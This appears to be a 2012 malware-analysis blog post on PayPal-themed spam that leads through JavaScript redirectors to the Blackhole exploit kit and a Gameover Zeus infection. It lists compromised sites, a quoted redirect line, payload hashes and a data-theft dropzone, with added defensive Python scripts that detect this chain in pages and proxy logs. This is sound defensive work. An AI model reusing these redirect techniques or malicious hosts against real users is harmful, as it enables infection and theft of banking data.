Paypal themed spam!

Subject:
YOU SENT A PAYMENT

URLs:
ispesa[.]com/8pe5eCMZ/index.html
gfclock[.]com/8pe5eCMZ/index.html
madiks[.]net/k4H1CSBf/index.html

PayPal-You Sent a Payment

The text 'View the details of this transaction online' contains hyperlinks to the compromised websites listed above. These pages contain no content other than 5 script tags loading JavaScript from:

50.57.29.172/hVg3GFAo/js.js
finantariauto[.]ro/5ZqETXNE/js.js
ipecturkey[.]com/E2UNfoGY/js.js
murlidharinstitutes[.]org/ShSyPU9s/js.js
oompa[.]de/VTwQKwDD/js.js

These JavaScript redirectors contain the following document.location assignment, which sends victims to a Blackhole Exploit Kit at 209.59.217.101:

document.location='hxxp://closteage[.]com/showthread.php?t=d7ad916d1c0396ff';
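The redirect chain described above (an empty landing page whose only content is a handful of external scripts, each of which is nothing but a location assignment) is easy to triage statically. The following Python script is an added example written for this post, not code from the original write-up: it parses a constructed copy of such a landing page, confirms it has no visible text and only external script tags, pulls the navigation target out of a constructed redirector body, and defangs the result for reporting. The sample HTML and JS bodies are constructed from the indicators quoted above; the parsing and regex logic is an assumption about how such pages are typically built, not a description of these specific files.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed landing page mirroring the post: no visible content, only the
# five external <script> tags. Hosts are re-fanged here so they parse as URLs.
LANDING_HTML = """<html><head></head><body>
<script src="http://50.57.29.172/hVg3GFAo/js.js"></script>
<script src="http://finantariauto.ro/5ZqETXNE/js.js"></script>
<script src="http://ipecturkey.com/E2UNfoGY/js.js"></script>
<script src="http://murlidharinstitutes.org/ShSyPU9s/js.js"></script>
<script src="http://oompa.de/VTwQKwDD/js.js"></script>
</body></html>"""

# Constructed body of one redirector script (the post quotes this one line).
REDIRECT_JS = "document.location='http://closteage.com/showthread.php?t=d7ad916d1c0396ff';"

# A benign script for comparison: no navigation at all.
BENIGN_JS = "var x = 1; console.log(x);"


class ScriptOnlyPage(HTMLParser):
    """Collect external script sources and any visible (non-script) text."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.visible_text = ""
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.script_srcs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script:
            self.visible_text += data.strip()


def analyze_landing_page(html):
    """Flag a page that renders nothing and only pulls in remote scripts."""
    p = ScriptOnlyPage()
    p.feed(html)
    suspicious = len(p.script_srcs) > 0 and p.visible_text == ""
    return {"script_srcs": p.script_srcs, "suspicious": suspicious}


# Matches bare navigation assignments such as document.location='...' or
# window.location.href="...". Assumed pattern, broad on purpose.
REDIRECT_RE = re.compile(
    r"""(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]"""
)


def extract_redirect(js):
    """Return the navigation target if the script assigns location, else None."""
    m = REDIRECT_RE.search(js)
    return m.group(1) if m else None


def defang(url):
    """Neutralise a URL for a report: hxxp scheme, [.] in the host only."""
    u = urlsplit(url)
    host = u.netloc.replace(".", "[.]")
    rest = u.path + ("?" + u.query if u.query else "")
    return u.scheme.replace("http", "hxxp") + "://" + host + rest


def triage(html, script_bodies):
    """Tie the two checks together: landing page verdict plus defanged targets."""
    page = analyze_landing_page(html)
    targets = [defang(t) for t in map(extract_redirect, script_bodies) if t]
    return {"page_suspicious": page["suspicious"],
            "script_count": len(page["script_srcs"]),
            "redirect_targets": targets}


if __name__ == "__main__":
    print(triage(LANDING_HTML, [REDIRECT_JS, BENIGN_JS]))
```

Run against the constructed inputs, `triage` reports the page as suspicious with five remote scripts and one defanged redirect target; the benign script contributes nothing. The same two functions can be pointed at real landing pages and their fetched scripts from a sandbox.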

It downloads the Gameover Zeus installer from the following location:

closteage[.]com/q.php?f=7245d&e=2

File: info.exe
MD5: 246d63e7b0fb47ee9c42ee588d0792eb
Size: 283,160 bytes

It then installs Zeus in %APPDATA%; the installed file had the following properties:

File: dewy.exe
MD5: d86ad63612e6276238c6f7bd2b35b4f3
Size: 283,160 bytes
Other: This file is digitally signed by '5r6Io0OJu3L2'
Company Name: Twain Working Group
File Description: Twain.dll Client's 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:02:03 20:33:28+01:00

The signer name on installed Gameover Zeus payloads has now changed to '5r6Io0OJu3L2', the first change in 5 days. Earlier payloads were signed by "SDOkUGUnMWwv".

This Gameover Zeus payload exfiltrated stolen data to a dropzone at 87.97.164.223:22005/index.php.
This payload had a bot ID of "NR21" and a CID of "3005". Webinjects were pulled from the same proxy at 87.97.164.223:22005.
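The infection chain above leaves a recognisable sequence in web proxy logs: a Blackhole landing URL (`showthread.php?t=` followed by 16 hex characters), the payload fetch (`/q.php?f=...&e=...`), and then POSTs to the Gameover Zeus dropzone at 87.97.164.223:22005/index.php. The following Python script is an added example, not part of the original post: it classifies each URL in a few constructed proxy log lines into one of those stages, groups hits per client, and returns a verdict. The log format (timestamp, client IP, method, URL, status) and the regexes are assumptions chosen to fit the indicators on this page; the negative sample (a forum `showthread.php?t=1234`) shows why the hex-length check matters.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Dropzone / webinject proxy named in the write-up.
DROPZONE_HOST = "87.97.164.223"
DROPZONE_PORT = 22005

# Stage patterns (assumed, derived from the URLs quoted in the post).
STAGES = [
    ("blackhole_landing", re.compile(r"^/showthread\.php\?t=[0-9a-f]{16}$")),
    ("blackhole_payload", re.compile(r"^/q\.php\?f=[0-9a-f]+&e=\d+$")),
]

# Constructed proxy log: "timestamp client_ip method url status".
SAMPLE_LOG = """2012-06-26T10:14:02 10.0.0.5 GET http://ispesa.com/8pe5eCMZ/index.html 200
2012-06-26T10:14:03 10.0.0.5 GET http://oompa.de/VTwQKwDD/js.js 200
2012-06-26T10:14:04 10.0.0.5 GET http://closteage.com/showthread.php?t=d7ad916d1c0396ff 200
2012-06-26T10:14:09 10.0.0.5 GET http://closteage.com/q.php?f=7245d&e=2 200
2012-06-26T10:14:30 10.0.0.5 POST http://87.97.164.223:22005/index.php 200
2012-06-26T10:15:00 10.0.0.7 GET http://example.com/forum/showthread.php?t=1234 200
"""


def classify(url):
    """Map a URL to an infection stage, or None if it matches nothing."""
    u = urlsplit(url)
    if u.hostname == DROPZONE_HOST and u.port == DROPZONE_PORT and u.path == "/index.php":
        return "zeus_dropzone"
    target = u.path + ("?" + u.query if u.query else "")
    for name, rx in STAGES:
        if rx.search(target):
            return name
    return None


def correlate(log_text):
    """Group stage hits per client IP, preserving log order."""
    chains = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines rather than crash on them
        _ts, client, _method, url, _status = parts
        stage = classify(url)
        if stage:
            chains[client].append((stage, url))
    return dict(chains)


def verdict(chain):
    """Landing alone means exposure; payload or dropzone traffic means compromise."""
    stages = {s for s, _ in chain}
    if stages & {"blackhole_payload", "zeus_dropzone"}:
        return "compromised"
    if "blackhole_landing" in stages:
        return "exposed"
    return "clean"


if __name__ == "__main__":
    for client, chain in correlate(SAMPLE_LOG).items():
        print(client, verdict(chain), [s for s, _ in chain])
```

On the constructed log, 10.0.0.5 walks through all three stages and is reported as compromised, while 10.0.0.7's ordinary forum URL never matches. In a real deployment the dropzone check should be keyed on the IP:port pair rather than the path alone, since `/index.php` is far too common to alert on by itself.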


6 Comments

  1. Posted June 27, 2012 at 12:00 am | Permalink | Reply

    Banking statements.

  2. Amy
    Posted June 27, 2012 at 7:32 pm | Permalink | Reply

    hate when scams are being put on

  3. Posted June 29, 2012 at 7:14 pm | Permalink | Reply

    hate scams

  4. Posted August 3, 2012 at 6:21 pm | Permalink | Reply

    don’t believe everything that comes into your email

  5. krista
    Posted August 4, 2012 at 2:12 am | Permalink | Reply

    These two articles have some of the similar words in each. The information given by both is somewhat relevant

  6. andrew
    Posted August 20, 2012 at 9:09 pm | Permalink | Reply

    what a load of shit
